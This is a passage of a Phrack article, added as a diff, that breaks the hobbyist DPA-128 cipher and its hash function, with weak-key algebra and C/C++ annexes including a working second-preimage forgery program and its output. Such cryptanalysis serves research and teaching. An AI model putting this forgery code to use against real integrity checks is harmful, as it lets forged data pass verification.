+quite easily with the carry problem. A key "k" is part of |W if and only if
+for each round the shift parameter is a multiple of 8. The reader should 
+understand why later.
+
+We will first present the attack on a reduced version of DPA for simplicity
+purpose and generalize it later to the full version.
+
+
+--[ 7.1 - Playing with a toy cipher
+
+Our toy cipher is a 2 rounds DPA. Moreover, the cipher takes as input 4*8
+bits instead of 16*8 = 128 bits which means that DPA_BLOCK_SIZE = 4. We 
+also make a little modification in bytechain() operation. Let's remember 
+the bytechain() function:
+
+void rbytechain(unsigned char *block)
+{
+    int i;
+    for (i = 0; i < DPA_BLOCK_SIZE; ++i)
+        block[i] ^= block[(i + 1) % DPA_BLOCK_SIZE];
+    return;
+}
+
+Since block is both input AND output of the function then we have for 
+DPA_BLOCK_SIZE = 4:
+
+    V(0) = U(0) xor U(1)
+    V(1) = U(1) xor U(2)
+    V(2) = U(2) xor U(3)
+    V(3) = U(3) xor V(0) = U(0) xor U(1) xor U(3)
+
+Where V(x) is the x'th byte element.
+
+Thus with our modification:
+
+    V(0) = U(0) xor U(1)
+    V(1) = U(1) xor U(2)
+    V(2) = U(2) xor U(3)
+    V(3) = U(3) xor U(0)
+
+Regarding the mathematical notation (pay your ascii !@#):
+
+    - U,V,W,Y vector notation of section 5 remains.
+    - Xj(i) is the i'th bit of vector Xj where j is j'th round.
+    - U0 vector is equivalent to P where P is a plaintext.
+    - m is the shift of round 0
+    - n is the shift of round 1
+    - xor will be written '+' since calculation is done in GF(2)
+    - All calculation of subscript will be done in the ring ZZ_32
+
+How did we choose |W? Using algebra in GF(2) implies to deal with the carry.
+However, if k is a weak key (part of |W), then we can manage the calculation
+so that it's not painful anymore.
+
+Let i be the lowest bit of any input byte. Therefore for each i part of the
+set {0,8,16,24} we have:
+
+u0(i)      = p(i)
+v0(i)      = p(i) + p(i+8)
+w0(i+m)    = v0(i)
+y0(i)      = w0(i) + k0(i) + C0(i)
+y0(i+m)    = w0(i+m) + k0(i+m) + C0(i+m)
+y0(i+m)    = p(i) + p(i+8) + k0(i+m) + C0(i+m)            /* carry(0) = 0 */
+y0(i+m)    = p(i) + p(i+8) + k0(i+m)
+
+u1(i)      = y0(i)
+v1(i)      = y0(i) + y0(i+8)
+w1(i+n)    = v1(i)
+y1(i)      = w1(i) + k1(i) + C1(i)
+y1(i+n)    = w1(i+n) + k1(i+n) + C1(i+n)
+y1(i+n)    = y0(i) + y0(i+8) + k1(i+n) + C1(i+n)
+y1(i+n+m)  = y0(i+m) + y0(i+m+8) + k1(i+n+m) + C1(i+n+m)  /* carry(0) = 0 */
+y1(i+n+m)  = p(i) + p(i+8) + k0(i+m) + p(i+8) + p(i+16) 
+           + k0(i+m+8) + k1(i+n+m)
+y1(i+n+m)  = p(i) + k0(i+m) + p(i+16) + k0(i+m+8) + k1(i+n+m)
+
+As stated before, i is part of the set {0,8,16,24} so we can write:
+
+y1(n+m)    = p(0)  + k0(m)    + p(16) + k0(m+8)  + k1(n+m)
+y1(8+n+m)  = p(8)  + k0(8+m)  + p(24) + k0(m+16) + k1(8+n+m)
+y1(16+n+m) = p(16) + k0(16+m) + p(0)  + k0(m+24) + k1(16+n+m)
+y1(24+n+m) = p(24) + k0(24+m) + p(8)  + k0(m)    + k1(24+n+m)
+
+In the case of a known plaintext attack, the attacker has the knowledge of
+a set of couples (P,Y1). Therefore considering the previous system, the 
+lowest bit of K0 and K1 vectors are the unknowns. Here we have a system 
+which is clearly underdefined since it is composed of 4 equations and
+4*2 unknowns. It will give us the relations between each lowest bit of Y 
+and the lowest bits of K0 and K1. 
+
+Remark 1: n,m are unknown. A trivial approach is to determine them which 
+costs a complexity of (2^4)^2 = 2^8. Although it may seem a good idea, 
+let's recall the reader that we are considering a round reduced cipher! 
+Indeed, applying the same idea to the full 16 rounds would cost us 
+(2^4)^16 = 2^64! Such a complexity is a pain in the ass even nowadays :-)
+
+A much better approach is to guess (n+m) as it costs 2^4 what ever the 
+number of rounds. It gives us the opportunity to write relations between 
+some input and output bits. We do not need to know exactly m and n. The 
+knowledge of the intermediate variables k0(x+m) and k1(y+n+m) is 
+sufficient.
+
+Remark 2: An underdefined system brings several solutions. We are 
+thus able to choose arbitrarily 4 variables thus fixing them with values of 
+our choice. Of course we have to choose so that we are able to solve the 
+system with remaining variables. For example taking k0(m), k0(m+8) and 
+k1(n+m) together is not fine because of the first equation. However, fixing
+all the k0(x+m) may be a good idea as it automatically gives the k1(y+n+m) 
+corresponding ones. 
+
+Now let's go further. Let i be part of the set {1,9,17,25}. We can write:
+
+u0(i)     = p(i)
+v0(i)     = p(i) + p(i+8)
+w0(i+m)   = v0(i)
+y0(i)     = w0(i) + k0(i) + w0(i-1)*k0(i-1)
+y0(i+m)   = w0(i+m) + k0(i+m) + w0(i+m-1)*k0(i+m-1)
+y0(i+m)   = p(i) + p(i+8) + k0(i+m) + w0(i+m-1)*k0(i+m-1)
+y0(i+m)   = p(i) + p(i+8) + k0(i+m) + (p(i-1) + p(i-1+8))*k0(i+m-1)
+
+u1(i)     = y0(i)
+v1(i)     = y0(i) + y0(i+8)
+w1(i+n)   = v1(i)
+y1(i)     = w1(i) + k1(i) + C1(i)
+y1(i)     = w1(i) + k1(i) + w1(i-1)*k1(i-1)
+y1(i+n)   = w1(i+n) + k1(i+n) + w1(i-1+n)*k1(i-1+n)
+y1(i+n)   = y0(i) + y0(i+8) + k1(i+n) + (y0(i-1) + y0(i+8-1)) * k1(i-1+n)
+
+y1(i+n+m) = y0(i+m) + y0(i+m+8) + k1(i+m+n) 
+          + (y0(i+m-1) + y0(i+m+8-1)) * k1(i+m+n-1)
+
+y1(i+n+m) = p(i) + p(i+8) + k0(i+m) + (p(i-1) + p(i-1+8)) * k0(i+m-1)
+          + p(i+8) + p(i+16) + k0(i+m+8) 
+	  + (p(i+8-1) + p(i-1+16)) * k0(i+m-1+8)
+	  + k1(i+n+m)
+          + k1(i+m+n-1) * [p(i-1) + p(i+8-1) + k0(i+m-1)]
+          + k1(i+m+n-1) * [p(i-1+8) + p(i+16-1) + k0(i+m-1+8)]
+
+y1(i+n+m) = p(i) + k0(i+m) + (p(i-1) + p(i-1+8)) * k0(i+m-1)
+          + p(i+16) + k0(i+m+8) + (p(i+8-1) + p(i-1+16)) * k0(i+m-1+8)
+          + k1(i+n+m)
+          + k1(i+m+n-1)*[p(i-1) + k0(i+m-1)]
+          + k1(i+m+n-1)*[p(i-1+16) + k0(i+m-1+8)]
+
+Thanks to the previous system resolution, we have the knowledge of 
+k0(i+m+n-1+x) and k1(i+m-1+y) variables. Therefore, we can reduce the 
+previous equation to: 
+
+A(i) = k0(i+m) + k0(i+m+8) + k1(i+n+m)           (alpha)
+
+where A(i) is a known value for the attacker.
+
+Remark 1: This equation represents the same system as found in case of i 
+being the lowest bit! Therefore all previous remarks remain.
+
+Remark 2: If we hadn't have the knowledge of k0(i+m+n-1+x) and k1(i+m-1+y)
+bits then the number of variables would have grown seriously. Moreover we 
+would have had to deal with some degree 2 monomials :-/.
+
+We can thus conjecture that the equation alpha will remain true for each i 
+part of {a,a+8,a+16,a+24} where 0 <= a < 8.
+
+
+--[ 7.2 - Generalization and expected complexity
+
+Let's deal with the real bytechain() function now.
+As stated before and for DPA_BLOCK_SIZE = 4 we have:
+
+V(0) = U(0) xor U(1)
+V(1) = U(1) xor U(2)
+V(2) = U(2) xor U(3)
+V(3) = U(0) xor U(1) xor U(3)
+
+This is clearly troublesome as the last byte V(3) is NOT calculated like 
+V(0), V(1) and V(2). Because of the rotations involved, we wont be able to
+know when the bit manipulated is part of V(3) or not.
+
+Therefore, we have to use a general formula:
+
+V(i) = U(i) + U(i+1) + a(i).U(i+2)
+where a(i) = 1 for i = 24 to 31
+
+For i part of {0,8,16,24} we have:
+
+u0(i)     = p(i)
+v0(i)     = p(i) + p(i+8)  + a0(i).p(i+16)
+w0(i+m)   = v0(i)
+y0(i)     = w0(i) + k0(i)   + C0(i)
+y0(i+m)   = w0(i+m) + k0(i+m) + C0(i+m)
+y0(i+m)   = p(i) + p(i+8) + a0(i).p(i+16) + k0(i+m) + C0(i+m) /*carry(0) = 0*/
+y0(i+m)   = p(i) + p(i+8)  + a0(i).p(i+16) + k0(i+m)
+
+So in the second round:
+
+u1(i)     = y0(i)
+v1(i)     = y0(i) + y0(i+8) + a1(i).y0(i+16)
+w1(i+n)   = v1(i)
+y1(i)     = w1(i) + k1(i) + C1(i)
+y1(i+n)   = w1(i+n) + k1(i+n) + C1(i+n)
+y1(i+n)   = y0(i) + y0(i+8) + a1(i).y0(i+16) + k1(i+n) + C1(i+n)
+y1(i+n+m) = y0(i+m) + y0(i+m+8) + a1(i+m).y0(i+m+16) + k1(i+n+m)
+
+y1(i+n+m) = p(i) + p(i+8) + a0(i).p(i+16) + k0(i+m)
+          + p(i+8) + p(i+16) + a0(i).p(i+24) + k0(i+m+8)
+          + a1(i+m).[p(i+16) + p(i+24) + a0(i).p(i) + k0(i+m+16)] + k1(i+n+m)
+
+y1(i+n+m) = p(i) + a0(i).p(i+16) + k0(i+m)
+          + p(i+16) + a0(i).p(i+24) + k0(i+m+8)
+          + a1(i+m).[p(i+16) + p(i+24) + a0(i).p(i) + k0(i+m+16)] + k1(i+n+m)
+
+a0(i) is not a problem since we know it. This is coherent with the fact 
+that the first operation of the cipher is rbytechain() which is invertible
+for the attacker. However, the problem lies in the a1(i+m) variables.
+
+Guessing a1(i+m) is out of question as it would cost us a complexity of 
+(2^4)^15 = 2^60 for the 16 rounds! The solution is to consider a1(i+m) as 
+an other set of 4 variables. We can also add the equation to our system:
+
+a1(m) + a1(m+8) + a1(m+16) + a1(m+24) = 1
+This equation will remain true for other bits.
+
+So what is the global complexity? Obviously with DPA_BLOCK_SIZE = 16 each 
+system is composed of 16+1 equations of 16+1 variables (we fixed the 
+others). Therefore, the complexity of the resolution is: 
+log(17^3) / log(2) ~ 2^13.
+
+We will solve 8 systems since there are 8 bits per byte. Thus the global 
+complexity is around (2^13)*8 = 2^16.
+
+Remark: We didn't take into account the calculation of equation as it is 
+assumed to be determined using a formal calculation program such as pari-gp 
+or magma.
+
+
+--[ 7.3 - Cardinality of |W
+
+What is the probability of choosing a weak key? We have seen that our weak
+key criterion is that for each round, the rotation parameter needs to be 
+multiple of 8. Obviously, it happens with 16 / 128 = 1/8 theoretical 
+probability per round. Since we consider subkeys being random, the 
+generation of rotation parameters are independent which means that the 
+overall probability is (1/16)^16 = 1/2^64.
+
+Although a probability of 1/2^64 means a (huge) set of 2^64 weak keys, in
+the real life, there are very few chances to choose one of them. In fact,
+you probably have much more chances to win lottery ;) However, two facts 
+must be noticed:
+
+    - We presented one set of weak keys but there be some more!
+    - We illustrated an other weakness in the conception of DPA-128
+
+Remark: A probability of 1/8 per round is completely theoretic as it 
+supposes a uniform distribution of hash32() output. Considering the extreme
+simplicity of the hash32() function, it wouldn't be too surprising to be
+different in practice. Therefore we made a short test to compute the real 
+probability (Annexe B).
+
+$ gcc test.hash32.c checksum128.o hash32.o -o test.hash32 -O3 
+-fomit-frame-pointer
+$ time ./test.hash32
+[+] Probability is 0.125204
+
+real 0m14.654s
+user 0m14.649s
+sys 0m0.000s
+
+$ gp -q
+? (1/0.125204) ^ 16
+274226068900783.2739747241633
+? log(274226068900783.2739747241633) / log(2)
+47.96235905375676878381741198
+?
+
+This result tells us clearly that the probability of shift being multiple 
+of 8 is around 1/2^2.99 ~ 1/8 per round which is assimilated to the 
+theoretical one since the difference is too small to be significant. In 
+order to improve the measure, we used checksum128() as an input of 
+hash32(). Furthermore, we also tried to test hash32() without the "*k &&" 
+bug mentioned earlier. Both tests gave similar results which means that the
+bug is not important in practice and that checksum128() doesn't seem to be 
+particularly skewed. This is a good point for DPA! :-D
+
+
+--[ 8 - Breaking DPA-based unkeyed hash function
+
+In his paper, Veins also explains how a hash function can be built out of 
+DPA. We will analyze the proposed scheme and will show how to completely 
+break it.
+
+
+--[ 8.1 - Introduction to hash functions
+
+Quoting once again the excellent HAC [MenVan]:
+"A hash function is a function h which has, as a minimum, the following two
+properties:
+
+1. compression - h maps an input x of arbitrary finit bitlength, to an
+output h(x) of fixed bitlength n.
+2. ease of computation - given h and an input x, h(x) is easy to compute.
+
+In cryptography there are essentially two families of hash functions:
+
+1. The MAC (Message Authentication Codes). They are keyed ones and provides
+both authentication (of source) and integrity of messages.
+2. The MDC (Modification Detection Code), sometimes referred as MIC. They 
+are unkeyed and only provide integrity. We will focus on this kind of 
+functions. When designing his hash function, the cryptographer generally 
+wants it to satisfy the three properties:
+
+- preimage resistance. For any y, it should not be possible (that is to say
+computationally infeasible) to find an x such as h(x) = y. Such a property
+implies that the function has to be non invertible.
+- 2nd preimage resistance. For any x, it should not be possible to find an
+x' such as h(x) = h(x') when x and x' are different.
+- collision resistance. It should not be possible to find an x and an x' 
+(with x different of x') such that h(x) = h(x').
+
+Remark 1: Properties 1 and 2 and essentials when dealing with binary 
+integrity.
+
+Remark 2: The published attacks on MD5 and SHA-0/SHA-1 were dealing with the
+third property. While it is true that finding collisions on a hash function
+is enough for the crypto community to consider it insecure (and sometimes
+leads to a new standard [NIST2007]), for most of usages it still remains 
+sufficient.
+
+There are many way to design an MDC function. Some functions are based on
+MD4 function such as MD5 or SHA* functions which heavily rely on boolean 
+algebra and operations in GF(2^32), some are based on NP problems such as 
+RSA and finally some others are block cipher based.
+
+The third category is particularly interesting since the security of the
+hash function can be reduced to the one of the underlying block cipher. 
+This is of course only true with a good design.
+
+
+--[ 8.2 - DPAsum() algorithm
+
+The DPA-based hash function lies in the functions DPA_sum() and 
+DPA_sum_write_to_file() which can be found respectively in file sum.c and
+data.c.
+
+Let's detail them a little bit using pseudo code:
+
+Let M be the message to hash, let M(i) be the i'th 128b block message.
+Let N = DPA_BLOCK_SIZE * i + j be the size in bytes of the message where i
+and j are integers such as i = N / DPA_BLOCK_SIZE and 0 <= j < 16.
+Let C be an array of 128 bits elements were intermediary results of hash
+calculation are stored. The last element of this array is the hash of the
+message. 
+
+func DPA_sum(K0,M,C):
+    
+    K0 = key("deadbeef");
+    IV = "0123456789abcdef";
+    
+    C(0) = E( IV , K0);
+    C(1) = E( IV xor M(0) , K0);
+    
+    FOR a = 1 to i-1:
+        C(a+1) = E( C(a) xor M(a) , K0);
+
+    if j == 0:
+        C(i+1) = E( C(i) xor 000...000 , K0)
+    else
+        C(i+1) = E( C(i) xor PAD( M(i) );
+        C(i+2) = E( C(i+1) xor 000...00S , K0) /* s = 16-j */
+    return;
+
+func DPA_sum_write_to_file(C, file):
+
+    write(file,C(last_element));
+    return;
+
+
+--[ 8.3 - Weaknesses in the design/implementation
+
+We noticed several implementation mistakes in the code:
+
+a) Using the algorithm of hash calculation, every element of array C is 
+defined recursively however C(0) is never used in calculation. This doesn't
+impact security in itself but is somewhat strange and could let us think 
+that the function was not designed before being programmed.
+
+b) When the size of M is not a multiple of DPA_BLOCK_SIZE (j is not equal 
+to 0) then the algorithms calculates the last element using a xor mask where
+the last byte gives information on the size of the original message. 
+However, what is included in the padding is not the size of the message in 
+itself but rather the size of padding.
+
+If we take the example of the well known Merkle-Damgard construction on 
+which are based MD{4,5} and SHA-{0,1} functions, then the length of the 
+message was initially appended in order to prevent collisions attacks for
+messages of different sizes. Therefore in the DPASum() case, appending j 
+to the message is not sufficient as it would be possible to find collisions
+for messages of size (DPA_BLOCK_SIZE*a + j) and (DPA_BLOCK_SIZE*b + j) were
+obviously a and b are different.
+
+Remark: The fact that the IV and the master key are initially fixed is not
+a problem in itself since we are dealing with MDC here.
+
+
+--[ 8.4 - A (2nd) preimage attack
+
+Because of the hash function construction properties, being given a 
+message X, it is trivial to create a message X' such as h(X) = h(X'). This
+is called building a 2nd preimage attack.
+
+We built a quick & dirty program to illustrate it (Annexe C). It takes a 
+32 bytes message as input and produces an other 32 bytes one with the same 
+hash:
+
+$ cat to.hack | hexdump -C
+00000000 58 41 4c 4b 58 43 4c 4b 53 44 4c 46 4b 53 44 46 |XALKXCLKSDLFKSDF|
+00000010 58 4c 4b 58 43 4c 4b 53 44 4c 46 4b 53 44 46 0a |XLKXCLKSDLFKSDF.|
+00000020
+$ ./dpa -s to.hack
+6327b5becaab3e5c61a00430e375b734
+$ gcc break_hash.c *.o -o break_hash -I ./include
+$ ./break_hash to.hack > hacked
+$ ./dpa -s hacked
+6327b5becaab3e5c61a00430e375b734
+$ cat hacked | hexdump -C
+00000000 43 4f 4d 50 4c 45 54 45 4c 59 42 52 4f 4b 45 4e |COMPLETELYBROKEN|
+00000010 3e bf de 93 d7 17 7e 1d 2a c7 c6 70 66 bb eb a3 |>.....~.*..pf...|
+00000020
+
+Nice isn't it ? :-) We were able to write arbitrary data in the first 16 
+bytes and then to calculate the next 16 bytes so that the 'hacked' file had
+the exact same hash. But how did we do such an evil thing?
+
+Assuming the size of both messages is 32 bytes then:
+
+h(Mi) = E(E(Mi(0) xor IV,K0) xor Mi(1),K0)
+
+Therefore, it is obvious that:
+
+h(M1) = h(M2) is equivalent to
+E(E(M1(0) xor IV,K0) xor M1(1),K0) = E(E(M2(0) xor IV,K0) xor M2(1),K0)
+
+Which can be reduced to:
+E(M1(0) xor IV,K0) xor M1(1) = E(M2(0) xor IV,K0) xor M2(1)
+
+Which therefore gives us:
+M2(1) = E(M2(0) xor IV,K0) xor E(M1(0) xor IV,K0) xor M1(1)  [A]
+
+Since M1,IV,K0 are known parameters then for a chosen M2(0), [A] gives us 
+M2(1) so that h(M1) = h(M2).
+
+Remark 1: Actually such a result can be easily generalized to n bytes 
+messages. In particular, the attacker can put anything in his message and
+"correct it" using the last blocks (if n >= 32).
+
+Remark 2: Of course building a preimage attack is also very easy. We 
+mentioned previously that we had for a 32 bytes message:
+h(Mi) = E(E(Mi(0) xor IV,K0) xor Mi(1),K0)
+
+Therefore, Mi(1) = E^-1(h(Mi),K0) xor E(Mi(0) xor IV,K0)     [B]
+
+The [B] equation tells us how to generate Mi(1) so that we have h(Mi) in
+output. It doesn't seem to be really a one way hash function does it ? ;-)
+Building a hash function out of a block cipher is a well known problem in
+cryptography which doesn't only involve the security of the underlying 
+block cipher. One should rely on one of the many well known and heavily 
+analyzed algorithms for this purpose instead of trying to design one.
+
+
+--[ 9 - Conclusion
+
+We put into evidence some weaknesses of the cipher and were also able to 
+totally break the proposed hash function built out of DPA. In his paper, 
+Veins implicitly set the bases of a discussion to which we wish to deliver
+our opinion. We claim that it is necessary to understand properly 
+cryptology. The goal of this paper wasn't to illustrate anything else but 
+that fact. Being hacker or not, paranoid or simply careful, the rule is the
+same for everybody in this domain: nothing should be done without reflexion.
+
+
+--[ 10 - Greetings
+
+#TF crypto dudes for friendly and smart discussions and specially X for 
+giving me a lot of hints. I learned a lot from you guys :-)
+#K40r1 friends for years of fun ;-) Hi all :)
+Finally but not least my GF and her kindness which is her prime 
+characteristic :> (However if she finds out the joke in the last sentence
+I may die :|)
+
+
+--[ 11 - Bibliography
+
+[DPA128] A Polyalphabetic Substitution Cipher, Veins, Phrack 62.
+[FakeP63] Keeping 0day Safe, m1lt0n, Phrack(.nl) 63.
+[MenVan] Handbook of Applied Cryptography, Menezes, Oorschot & Vanstone.
+[Knud99] Correlation in RC6, L. Knudsen & W. Meier.
+[CrypTo] Two balls ownz one, http://fr.wikipedia.org/wiki/Cryptorchidie
+[Vaud] An Experiment on DES - Statistical Cryptanalysis, S. Vaudenay.
+[Ryabko] Adaptative chi-square test and its application to some 
+cryptographic problems, B. Ryabko.
+[CourtAlg] How Fast can be Algebraic Attacks on Block Ciphers ?, Courtois.
+[BiSha90] Differential Cryptanalysis of DES-like Cryptosystems, E. Biham 
+& A. Shamir, Advances in Cryptology - CRYPTO 1990.
+[Matsui92] A new method for known plaintext attack of FEAL cipher, Matsui
+& A. Yamagishi, EUROCRYPT 1992.
+[NSA2007] Just kidding ;-)
+[SHOUP] NTL library, V. Shoup, http://www.shoup.net/ntl/
+[NIST2007] NIST, http://www.csrc.nist.gov/pki/HashWorkshop/index.html, 2007
+
+
+--[ Annexe A - Breaking the linearised version
+
+8<- - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - -
+/* Crappy C/C++ source. I'm in a hurry for the paper redaction so don't 
+ * blame me toooooo much please ! :> */
+
+#include <iostream>
+#include <fstream>
+#include <openssl/rc4.h>
+#include <NTL/ZZ.h>
+#include <NTL/ZZ_p.h>
+#include <NTL/mat_GF2.h>
+#include <NTL/vec_GF2.h>
+#include <NTL/GF2E.h>
+#include <NTL/GF2XFactoring.h>
+#include "dpa.h"
+
+using namespace NTL;
+
+void
+S_E2 (unsigned char *key, unsigned char *block, unsigned int s)
+{
+    int i;
+    for (i = 0; i < DPA_BLOCK_SIZE; ++i)
+    {
+        block[i] ^= (key[i] ^ s) % 256;
+    }
+    return;
+}
+
+void
+E2 (unsigned char *key, unsigned char *block, unsigned int shift)
+{
+    rbytechain (block);
+    rbitshift (block, shift);
+    S_E2 (key, block, shift);
+}
+
+void 
+DPA_ecb_encrypt (DPA_KEY * key, unsigned char * src, unsigned char * dst)
+{
+    int j;
+    memcpy (dst, src, DPA_BLOCK_SIZE);
+    for (j = 0; j < 16; j++)
+        E2 (key->subkey[j].key, dst, key->subkey[j].shift);
+    return;
+}
+
+void affichage(unsigned char *chaine)
+{
+    int i;
+    for(i=0; i<16; i++)
+        printf("%.2x",(unsigned char )chaine[i]);
+    printf("\n");
+}
+
+unsigned char test_p[] = "ABCD_ABCD_12____";
+unsigned char test_c1[16];
+unsigned char test_c2[16];
+DPA_KEY key;
+RC4_KEY rc4_key;
+
+struct vect {
+    unsigned char plaintxt[16];
+    unsigned char ciphertxt[16];
+};
+
+struct vect toto[128];
+unsigned char src1[16], src2[16];
+unsigned char block1[16], block2[16];
+
+int main()
+{
+
+    /* Key */
+    unsigned char str_key[] = " _323DFF?FF4cxsdé&";
+    DPA_set_key (&key, str_key, DPA_KEY_SIZE);
+    
+    /* Init our RANDOM generator */
+    char time_key[16];
+    snprintf(time_key, 16, "%d%d",(int)time(NULL), (int)time(NULL));
+    RC4_set_key(&rc4_key, strlen(time_key), (unsigned char *)time_key);
+   
+    /* Let's crypt 16 plaintexts */
+    printf("[+] Generating the plaintexts / ciphertexts\n");
+    
+    int i=0;
+    int a=0;
+    for(; i<128; i++)
+    {
+         RC4(&rc4_key, 16, src1, src1); // Input is nearly random :)
+         DPA_ecb_encrypt (&key, src1, block1);
+         RC4(&rc4_key, 16, src2, src2); // Input is nearly random :)
+         DPA_ecb_encrypt (&key, src2, block2);
+         
+	 for(a=0;a<16; a++)
+         {
+             toto[i].plaintxt[a] = src1[a] ^ src2[a];
+             toto[i].ciphertxt[a] = block1[a] ^ block2[a];
+         }
+    }
+
+    /* Now the NTL stuff */
+
+    printf("[+] NTL stuff !\n");
+    vec_GF2 m2(INIT_SIZE,128);
+    vec_GF2 B(INIT_SIZE,128);
+    mat_GF2 M(INIT_SIZE,128,128);
+    mat_GF2 Mf(INIT_SIZE,128,128); // The final matrix !
+    clear(Mf);
+    clear(M);
+    clear(m2);
+    clear(B);
+
+    /* Lets fill M correctly */
+    
+    int k=0;
+    int j=0;
+    for(k=0; k<128; k++) // each row !
+    {
+        for(i=0; i<16; i++)
+        {
+            for(j=0; j<8; j++)
+                M.put(i*8+j,k,(toto[k].plaintxt[i] >> j)&0x1);
+        }
+    }
+
+    GF2 d;
+    determinant(d,M);
+
+    /* if !det then it means the vector were linearly linked :'( */
+   
+   if(IsZero(d))
+   {
+       std::cout << "det(M) = 0\n" ;
+       exit(1);
+   }
+
+   /* Let's solve the 128 system :) */
+   
+    printf("[+] Calculation of Mf\n");
+    for(k=0; k<16; k++)
+    {
+        for(j=0; j<8; j++)
+        {
+            for(i=0; i<128; i++)
+            {
+                 B.put(i,(toto[i].ciphertxt[k] >> j)&0x1);
+            }
+            solve(d, m2, M, B);
+
+#ifdef __debug__
+            std::cout << "m2 is " << m2 << "\n";
+#endif
+
+            int b=0;
+            for(;b<128;b++)
+                Mf.put(k*8+j,b,m2.get(b));
+        }
+    }
+
+#ifdef __debug__
+    std::cout << "Mf = " << Mf << "\n";
+#endif
+
+    /* Now that we have Mf, let's make a test ;) */
+
+    printf("[+] Let's make a test !\n");
+    bzero(test_c1, 16);
+    bzero(test_c2, 16);
+    char DELTA_X[16];
+    char DELTA_Y[16];
+    bzero(DELTA_X, 16);
+    bzero(DELTA_Y, 16);
+    DPA_ecb_encrypt (&key, test_p, test_c1);
+
+    // DELTA_X !
+    unsigned char U0[] = "ABCDEFGHABCDEFG1";
+    unsigned char Y0[16];
+    DPA_ecb_encrypt (&key, U0, Y0);
+    
+    for(i=0; i<16; i++)
+    {
+        DELTA_X[i] = test_p[i] ^ U0[i];
+    }
+
+    // DELTA_Y !
+    vec_GF2 X(INIT_SIZE,128);
+    vec_GF2 Y(INIT_SIZE,128);
+    clear(X);
+    clear(Y);
+    for(k=0; k<16; k++)
+    {
+         for(j=0; j<8; j++)
+         {
+             X.put(k*8+j,(DELTA_X[k] >> j)&0x1);
+         }
+    }
+
+    Y = Mf * X;
+
+#ifdef __debug__
+    std::cout << "X = " << X << "\n";
+    std::cout << "Y = " << Y << "\n";
+#endif
+
+    GF2 z;
+    for(k=0; k<16; k++)
+    {
+        for(j=0; j<8; j++)
+        {
+            z = Y.get(k*8+j);
+            if(IsOne(z))
+                DELTA_Y[k] |= (1 << j);
+        }
+    }
+
+    // test_c2 !
+
+    for(i=0; i<16; i++)
+        test_c2[i] = DELTA_Y[i] ^ Y0[i];
+
+    /* Compare the two vectors */
+    
+    if(!memcmp(test_c1,test_c2,16))
+        printf("\t=> Well done boy :>\n");
+    else
+        printf("\t=> Hell !@#\n");
+
+#ifdef __debug__
+    affichage(test_c1);
+    affichage(test_c2);
+#endif
+    return 0;
+}
+8<- - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - -
+
+
+--[ Annexe B - Probability evaluation of (hash32()%8 == 0)
+
+8<- - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - -
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <time.h>
+
+#define NBR_TESTS 0xFFFFF
+
+int main()
+{
+    int i = 0, j = 0;
+    char buffer[16];
+    int cmpt = 0;
+    int rand = (time_t)time(NULL);
+    float proba = 0;
+    srandom(rand);
+    for(;i<NBR_TESTS;i++)
+    {
+        for(j=0; j<4; j++)
+        {
+            rand = random();
+            memcpy(buffer+4*j,&rand,4);
+        }
+        checksum128 (buffer, buffer, 16);
+        if(!(hash32(buffer,16)%8))
+            cmpt++;
+    }
+    proba = (float)cmpt/(float)NBR_TESTS;
+    printf("[+] Probability is around %f\n",proba);
+    return 0;
+}
+8<- - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - -
+
+
+--[ Annexe C - 2nd preimage attack on 32 bytes messages
+
+8<- - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - -
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include "dpa.h"
+
+void
+E2 (unsigned char *key, unsigned char *block, unsigned int shift)
+{
+    rbytechain (block);
+    rbitshift (block, shift);
+    S_E (key, block, shift);
+}
+
+void 
+DPA_ecb_encrypt (DPA_KEY * key, unsigned char * src, unsigned char * dst)
+{
+    int j;
+    memcpy (dst, src, DPA_BLOCK_SIZE);
+    for (j = 0; j < 16; j++)
+        E2 (key->subkey[j].key, dst, key->subkey[j].shift);
+    return;
+}
+
+void affichage(unsigned char *chaine)
+{
+    int i;
+    for(i=0; i<16; i++)
+        printf("%.2x",(unsigned char )chaine[i]);
+    printf("\n");
+}
+
+int main(int argc, char **argv)
+{
+    DPA_KEY key;
+    unsigned char str_key[] = "deadbeef";
+    unsigned char IV[] = "0123456789abcdef";
+    unsigned char evil_payload[] = "COMPLETELYBROKEN";
+    unsigned char D0[16],D1[16];
+    unsigned char final_message[32];
+    int fd_r = 0;
+    int i = 0;
+    
+    if(argc < 2)
+    {
+        printf("Usage : %s <file>\n",argv[0]);
+        exit(EXIT_FAILURE);
+    }
+
+    DPA_set_key (&key, str_key,8);
+    if((fd_r = open(argv[1], O_RDONLY)) < 0)
+    {
+        printf("[+] Fuck !@#\n");
+        exit(EXIT_FAILURE);
+    }
+
+    if(read(fd_r, D0, 16) != DPA_BLOCK_SIZE)
+    {
+        printf("Too short !@#\n");
+        exit(EXIT_FAILURE);
+    }
+
+    if(read(fd_r, D1, 16) != DPA_BLOCK_SIZE)
+    {
+        printf("Too short 2 !@#\n");
+        exit(EXIT_FAILURE);
+    }
+    close(fd_r);
+    memcpy(final_message, evil_payload, DPA_BLOCK_SIZE);
+    blockchain(evil_payload, IV);
+    DPA_ecb_encrypt (&key, evil_payload, evil_payload);
+    blockchain(D0,IV);
+    DPA_ecb_encrypt (&key, D0, D0);
+    blockchain(D0,D1);
+    blockchain(evil_payload, D0);
+    memcpy(final_message+DPA_BLOCK_SIZE, evil_payload, DPA_BLOCK_SIZE);
+    
+    for(i=0; i<DPA_BLOCK_SIZE*2; i++)
+        printf("%c",final_message[i]);
+    return 0;
+}
+8<- - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - -
+
diff --git a/phrack64/11.txt b/phrack64/11.txt
new file mode 100644
index 0000000..2531dbb
--- /dev/null
+++ b/phrack64/11.txt
@@ -0,0 +1,2990 @@
+              _                                                _
+            _/B\_                                            _/W\_
+            (* *)            Phrack #64 file 11               (* *)
+            | - |                                            | - |
+            |   |        Mac OS X wars - a XNU Hope          |   |
+            |   |                                            |   |
+            |   |      by nemo <nemo@felinemenace.org>       |   |
+            |   |                                            |   |
+            |   |                                            |   |
